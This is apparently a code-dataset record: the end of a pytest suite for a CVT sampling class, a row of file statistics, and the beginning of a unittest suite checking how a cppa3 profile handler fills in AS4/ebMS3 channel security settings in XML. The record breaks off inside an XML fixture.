CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=1e-10, sampling_type="selection")
@pytest.mark.unit
def test__init__selection_12(self):
input_array = self.test_data_numpy
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=0.09, sampling_type="selection")
np.testing.assert_array_equal(CVTClass.eps,0.09)
@pytest.mark.unit
def test__init__selection_13(self):
input_array = self.test_data_numpy
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=-0.09, sampling_type="selection")
np.testing.assert_array_equal(CVTClass.eps,-0.09)
@pytest.mark.unit
def test__init__creation_01(self):
input_array = self.test_data_list
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None, sampling_type=None)
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres,5)
@pytest.mark.unit
def test__init__creation_02(self):
input_array = self.test_data_list
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None,sampling_type='creation')
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres,5)
@pytest.mark.unit
def test__init__creation_03(self):
input_array = self.test_data_list
CVTClass = CVTSampling( input_array, number_of_samples=100,tolerance=None, sampling_type='creation')
np.testing.assert_array_equal(CVTClass.data, input_array)
np.testing.assert_array_equal(CVTClass.number_of_centres,100)
@pytest.mark.unit
def test__init__creation_04(self):
input_array = self.test_data_list
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=0, tolerance=None,sampling_type='creation')
@pytest.mark.unit
def test__init__creation_05(self):
input_array = self.test_data_list
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=-1,tolerance=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_06(self):
input_array = self.test_data_list
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=1.1,tolerance=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_07(self):
input_array = self.test_data_numpy
with pytest.raises(ValueError):
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_08(self):
input_array = self.test_data_pandas
with pytest.raises(ValueError):
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None, sampling_type='creation')
@pytest.mark.unit
def test__init__creation_09(self):
input_array = self.test_data_list
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=0.11, sampling_type="creation")
@pytest.mark.unit
def test__init__creation_10(self):
input_array = self.test_data_list
with pytest.warns(Warning):
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=1e-10, sampling_type="creation")
@pytest.mark.unit
def test__init__creation_11(self):
input_array = self.test_data_list
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=0.09, sampling_type="creation")
np.testing.assert_array_equal(CVTClass.eps,0.09)
@pytest.mark.unit
def test__init__creation_11(self):
input_array = self.test_data_list
CVTClass = CVTSampling( input_array,number_of_samples=None, tolerance=-0.09, sampling_type="creation")
np.testing.assert_array_equal(CVTClass.eps,-0.09)
@pytest.mark.unit
def test__init__creation_selection_01(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = CVTSampling( input_array, number_of_samples=None, tolerance=None,sampling_type=1)
@pytest.mark.unit
def test__init__creation_selection_02(self):
input_array = self.test_data_numpy
with pytest.raises(Exception):
CVTClass = LatinHypercubeSampling( input_array, number_of_samples=None, tolerance=None,sampling_type='jp')
@pytest.mark.unit
def test_random_sample_selection_01(self):
size = (5,2)
out_random_points = CVTSampling.random_sample_selection(size[0],size[1])
assert (out_random_points>=0).all() and (out_random_points<=1).all()
assert out_random_points.shape == size
@pytest.mark.unit
def test_random_sample_selection_02(self):
size = (0,2)
out_random_points = CVTSampling.random_sample_selection(size[0],size[1])
assert (out_random_points>=0).all() and (out_random_points<=1).all()
assert out_random_points.shape == size
@pytest.mark.unit
def test_random_sample_selection_03(self):
size = (2,0)
out_random_points = CVTSampling.random_sample_selection(size[0],size[1])
assert (out_random_points>=0).all() and (out_random_points<=1).all()
assert out_random_points.shape == size
@pytest.mark.unit
def test_random_sample_selection_04(self):
size = (5,-1)
with pytest.raises(ValueError):
out_random_points = CVTSampling.random_sample_selection(size[0],size[1])
@pytest.mark.unit
def test_random_sample_selection_05(self):
size = (5,1.1)
with pytest.raises(TypeError):
out_random_points = CVTSampling.random_sample_selection(size[0],size[1])
@pytest.mark.unit
def test_eucl_distance_01(self):
u = np.array( [ [3] ])
v = np.array( [ [5] ])
expected_output = 2
output = CVTSampling.eucl_distance(u, v)
assert expected_output == output
@pytest.mark.unit
def test_eucl_distance_02(self):
u = np.array([ [1, 2] ])
v = np.array([ [3, 4] ])
expected_output = 8 ** 0.5
output = CVTSampling.eucl_distance(u, v)
assert expected_output == output
@pytest.mark.unit
def test_eucl_distance_03(self):
u = np.array([ [1, 2], [3, 4] ])
v = np.array([ [5, 6], [7, 8] ])
expected_output = np.array([32**0.5, 32**0.5])
output = CVTSampling.eucl_distance(u, v)
np.testing.assert_array_equal(expected_output, output)
@pytest.mark.unit
def test_eucl_distance_04(self):
u = np.array([ [1, 2]])
v = np.array([ [5, 6], [7, 8] ])
expected_output = np.array([32**0.5, 72**0.5])
output = CVTSampling.eucl_distance(u, v)
np.testing.assert_array_equal(expected_output, output)\
@pytest.mark.unit
def test_create_centres_01(self):
initial_centres = np.array([ [0, 0], [1, 1] ])
current_random_points = np.array([[0.6, 0.6], [0.3, 0.3]])
current_centres = np.array([1, 0])
counter = 1
expected_output = np.array([ [0.15, 0.15], [0.8, 0.8]])
output = CVTSampling.create_centres(initial_centres, current_random_points, current_centres, counter)
np.testing.assert_array_equal(expected_output, output)
@pytest.mark.unit
def test_create_centres_02(self):
initial_centres = np.array([ [0, 0], [1, 1] ])
current_random_points = np.array([[0.6, 0.6], [0.3, 0.3]])
current_centres = np.array([1, 0])
counter = 10
expected_output = np.array([ [0.3/11, 0.3/11], [10.6/11, 10.6/11]])
output = CVTSampling.create_centres(initial_centres, current_random_points, current_centres, counter)
np.testing.assert_array_equal(expected_output, output)
@pytest.mark.unit
def test_create_centres_03(self):
initial_centres = np.array([ [0, 0], [1, 1] ])
current_random_points = np.array([[0.6, 0.6], [0.8, 0.8]])
current_centres = np.array([1, 1])
counter = 5
expected_output = np.array([ [0.5/6, 0.5/6], [5.7/6, 5.7/6]])
output = CVTSampling.create_centres(initial_centres, current_random_points, current_centres, counter)
np.testing.assert_array_equal(expected_output, output)
@pytest.mark.unit
def test_create_centres_04(self):
initial_centres = np.array([ [0, 0, 0], [1, 1, 1] ])
current_random_points = np.array([[0.1, 0.1, 0.1], [0.3, 0.3, 0.3], [0.5, 0.5, 0.5], [0.7, 0.7, 0.7], [0.9, 0.9, 0.9]])
current_centres = np.array([0, 0, 0, 1, 1])
counter = 4
expected_output = np.array([ [0.3/5, 0.3/5, 0.3/5], [4.8/5, 4.8/5, 4.8/5]])
output = CVTSampling.create_centres(initial_centres, current_random_points, current_centres, counter)
np.testing.assert_array_equal(expected_output, output)
@pytest.mark.component
def test_sample_points_01(self):
for num_samples in [None,10,1]:
input_array = self.test_data_numpy
CVTClass = CVTSampling( input_array,number_of_samples=num_samples, tolerance=None, sampling_type="selection")
unique_sample_points = CVTClass.sample_points()
expected_testing = np.array([True]*unique_sample_points.shape[0], dtype=bool)
out_testing = [unique_sample_points[i,:] in input_array for i in range(unique_sample_points.shape[0])]
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0),unique_sample_points)
np.testing.assert_array_equal(expected_testing,out_testing)
@pytest.mark.component
def test_sample_points_02(self):
for num_samples in [None,10,1]:
input_array = self.test_data_list
CVTClass = CVTSampling(input_array, number_of_samples=num_samples, sampling_type="creation")
unique_sample_points = CVTClass.sample_points()
input_array = np.array(input_array)
for i in range(input_array.shape[1]):
var_range = input_array[:,i]
assert (unique_sample_points[:,i]>=var_range[0]).all() and (unique_sample_points[:,i]<=var_range[1]).all()
np.testing.assert_array_equal(np.unique(unique_sample_points, axis=0).shape,unique_sample_points.shape)
if __name__ == '__main__':
unittest.main()
| 53.926389
| 382
| 0.696075
| 10,847
| 77,654
| 4.664423
| 0.034203
| 0.075304
| 0.039016
| 0.047376
| 0.929202
| 0.910821
| 0.89663
| 0.881293
| 0.854195
| 0.829726
| 0
| 0.047463
| 0.206931
| 77,654
| 1,439
| 383
| 53.963864
| 0.774085
| 0.195186
| 0
| 0.757426
| 0
| 0
| 0.012861
| 0
| 0
| 0
| 0
| 0
| 0.152475
| 1
| 0.146535
| false
| 0
| 0.005941
| 0
| 0.158416
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3ed25b7995d14c366569f244a4cc6e4cd2095a3
| 78,411
|
py
|
Python
|
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
tests/test_profile.py
|
fspijkerman/cppa3
|
d9af606fd96f1f32a07333011d46c4691e108558
|
[
"MIT"
] | null | null | null |
import unittest, lxml, logging, os
from inspect import getsourcefile
from os.path import abspath, dirname, join
from cppa3.profile import ChannelProfileHandler
from lxml import etree
class ProfileTestCase( unittest.TestCase ):
def setUp(self):
logging.getLogger('').handlers = []
logging.basicConfig(level=logging.DEBUG,
filename="profile_test.log")
thisdir = dirname(abspath(getsourcefile(lambda:0)))
self.configdatadir = join(thisdir,'config')
config_file = os.path.join(self.configdatadir,
'channelprofiles.xml')
parser = lxml.etree.XMLParser(remove_blank_text=True)
configuration_data = lxml.etree.parse(config_file, parser)
self.handler = ChannelProfileHandler(configuration_data)
self.parser = parser
def _test_regression(self, id, created, expected):
created_as_text = lxml.etree.tostring(created,
pretty_print=True)
expected_as_text = lxml.etree.tostring(expected,
pretty_print=True)
if created_as_text != expected_as_text:
logging.info('Created {}:\n{}\nExpected:{}\n'.format(id,
created_as_text,
expected_as_text))
raise Exception('{}: created:\n{}\nExpected:\n{}'.format(id,
created_as_text,
expected_as_text))
else:
logging.info('Regression test for {} passed'.format(id))
def test_0001(self):
logging.info('Test 0001')
data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/cprofiles/200809/as4ebhandler</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
</cppa:Signature>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>http://docs.oasis-open.org/ebxml-msg/ebms/v3.0/ns/cprofiles/200809/as4ebhandler</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>http://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:Signature>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
self._test_regression('0001', result, expected)
def test_0002(self):
logging.info('Test 0002')
data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#aes128-cbc</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
self._test_regression('0002', result, expected)
def test_0003(self):
logging.info('Test 0003')
data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
self._test_regression('0003', result, expected)
def test_0004(self):
logging.info('Test 0004')
data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptAttachments>true</cppa:EncryptAttachments>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2001/04/xmlenc#aes128-cbc</cppa:EncryptionAlgorithm>
<cppa:EncryptAttachments>true</cppa:EncryptAttachments>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
self._test_regression('0004', result, expected)
def test_0005(self):
logging.info('Test 0005')
data = etree.fromstring("""<?xml version="1.0"
encoding="UTF-8"?><cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel
xmlns:pycppa3="https://pypi.python.org/pypi/cppa3">
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:WSSecurityBinding pycppa3:ifused="true">
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes256-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel></cppa:CPP>
""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel>
<cppa:ChannelProfile>multi_enc_alg</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Encryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes256-gcm</cppa:EncryptionAlgorithm>
</cppa:Encryption>
</cppa:WSSecurityBinding>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
self._test_regression('0005', result, expected)
#@unittest.skip('Fix later')
def test_0006(self):
logging.info('Test 0006')
data = etree.fromstring("""<?xml version="1.0" encoding="UTF-8"?>
<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel package="entsog_package">
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Signature>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:RetryHandling>
<cppa:Retries>10</cppa:Retries>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel package="entsog_package" includeAgreementRef="false">
<cppa:Description xml:lang="en">Channel for any ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>https://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
<cppa:SigningCertificateRef certId="_OYHRBO"/>
</cppa:Signature>
<cppa:Encryption>
<cppa:KeyEncryption>
<cppa:EncryptionAlgorithm> http://www.w3.org/2009/xmlenc11#rsa-oaep</cppa:EncryptionAlgorithm>
<cppa:MaskGenerationFunction>http://www.w3.org/2009/xmlenc11#mgf1sha256</cppa:MaskGenerationFunction>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:KeyEncryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:DuplicateHandling>
<cppa:DuplicateElimination>true</cppa:DuplicateElimination>
<cppa:PersistDuration>P10D</cppa:PersistDuration>
</cppa:DuplicateHandling>
<cppa:RetryHandling>
<cppa:Retries>10</cppa:Retries>
<cppa:RetryInterval>PT30S</cppa:RetryInterval>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
<cppa:ErrorHandling>
<cppa:DeliveryFailuresNotifyProducer>true</cppa:DeliveryFailuresNotifyProducer>
</cppa:ErrorHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>
""", self.parser)
self._test_regression('0006', result, expected)
def test_0007(self):
logging.info('Test 0007')
data = etree.fromstring("""<?xml version="1.0" encoding="UTF-8"?>
<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel id="ch_receive" transport="tr_receive" package="entsog_package">
<cppa:Description xml:lang="en">Channel for incoming ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:WSSecurityBinding>
<cppa:Encryption>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:ErrorHandling>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>""", self.parser)
result = self.handler.apply_profile_configs(data)
logging.info('Result: {}'.format(lxml.etree.tostring(result,
pretty_print=True)))
expected = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0">
<cppa:ebMS3Channel id="ch_receive" transport="tr_receive" package="entsog_package" includeAgreementRef="false">
<cppa:Description xml:lang="en">Channel for incoming ENTSOG AS4 User Messages</cppa:Description>
<cppa:ChannelProfile>http://www.entsog.eu/publications/as4#AS4-USAGE-PROFILE/v2.0/UserMessageChannel</cppa:ChannelProfile>
<cppa:SOAPVersion>1.2</cppa:SOAPVersion>
<cppa:WSSecurityBinding>
<cppa:WSSVersion>1.1</cppa:WSSVersion>
<cppa:Signature>
<cppa:SignatureAlgorithm>https://www.w3.org/2001/04/xmldsig-more#rsa-sha256</cppa:SignatureAlgorithm>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:Signature>
<cppa:Encryption>
<cppa:KeyEncryption>
<cppa:EncryptionAlgorithm> http://www.w3.org/2009/xmlenc11#rsa-oaep</cppa:EncryptionAlgorithm>
<cppa:MaskGenerationFunction>http://www.w3.org/2009/xmlenc11#mgf1sha256</cppa:MaskGenerationFunction>
<cppa:DigestAlgorithm>http://www.w3.org/2001/04/xmlenc#sha256</cppa:DigestAlgorithm>
</cppa:KeyEncryption>
<cppa:EncryptionAlgorithm>http://www.w3.org/2009/xmlenc11#aes128-gcm</cppa:EncryptionAlgorithm>
<cppa:EncryptionCertificateRef certId="_YE5XZF"/>
</cppa:Encryption>
</cppa:WSSecurityBinding>
<cppa:AS4ReceptionAwareness>
<cppa:DuplicateHandling>
<cppa:DuplicateElimination>true</cppa:DuplicateElimination>
<cppa:PersistDuration>P10D</cppa:PersistDuration>
</cppa:DuplicateHandling>
<cppa:RetryHandling>
<cppa:Retries>5</cppa:Retries>
<cppa:RetryInterval>PT30S</cppa:RetryInterval>
</cppa:RetryHandling>
</cppa:AS4ReceptionAwareness>
<cppa:ErrorHandling>
<cppa:DeliveryFailuresNotifyProducer>true</cppa:DeliveryFailuresNotifyProducer>
</cppa:ErrorHandling>
<cppa:ReceiptHandling>
</cppa:ReceiptHandling>
<cppa:Compression>
<cppa:CompressionAlgorithm>application/gzip</cppa:CompressionAlgorithm>
</cppa:Compression>
</cppa:ebMS3Channel>
</cppa:CPP>
""", self.parser)
self._test_regression('0007', result, expected)
def test_0008(self):
logging.info('Test 0008')
data = etree.fromstring("""<cppa:CPP xmlns:cppa="http://docs.oasis-open.org/ebcore/ns/cppa/v3.0" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://docs.oasis-open.org/ebxmlcppa/cppa-3.0 file:../../../cppa3-xsd/cppa3.xsd">
<cppa:ProfileInfo>
<cppa:ProfileIdentifier>EASEE-gas AS2 Profile for TSO 2</cppa:ProfileIdentifier>
</cppa:ProfileInfo>
<cppa:PartyInfo>
<cppa:PartyName xml:lang="en">TSO 2</cppa:PartyName>
<cppa:PartyId type="http://www.entsoe.eu/eic-codes/eic-party-codes-x">21X-EU-B-A0A0A-B</cppa:PartyId>
<cppa:PartyContact>
<cppa:ContactType>Technical Contact</cppa:ContactType>
<cppa:DirectTelephone>+3761234560</cppa:DirectTelephone>
<cppa:Email>edi@tso2.eu</cppa:Email>
</cppa:PartyContact>
<cppa:Certificate id="_SCNXER">
<ds:KeyInfo>
<ds:KeyName>Signing certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:Certificate id="_4UP74O">
<ds:KeyInfo>
<ds:KeyName>Encryption certificate for TSO 2</ds:KeyName>
<ds:X509Data>
<ds:X509Certificate>RGl0IGlzIGVlbiBhbmRlciBjZXJ0aWZpY2FhdCBpbiBiYXNlIDY0IGNvZGVyaW5n</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</cppa:Certificate>
<cppa:CertificateDefaults>
<cppa:SigningCertificateRef certId="_SCNXER"/>
<cppa:EncryptionCertificateRef certId="_4UP74O"/>
</cppa:CertificateDefaults>
</cppa:PartyInfo>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZSZ"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_2">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_1_4">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A10</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_6">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_2_8">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZHC"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A02</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="receive" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_3_10">
<cppa:ChannelId>b_ch_receive</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUA"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A09</cppa:Service>
<cppa:ActionBinding payloadProfileId="edigas" sendOrReceive="send" action="http://docs.oasis-open.org/ebxml-msg/as4/200902/action" id="ab_4_12">
<cppa:ChannelId>b_ch_send</cppa:ChannelId>
</cppa:ActionBinding>
</cppa:ServiceBinding>
</cppa:ServiceSpecification>
<cppa:ServiceSpecification>
<cppa:PartyRole name="ZSO"/>
<cppa:CounterPartyRole name="ZUF"/>
<cppa:ServiceBinding>
<cppa:Service type="http://edigas.org/service">A11</cppa:Service>
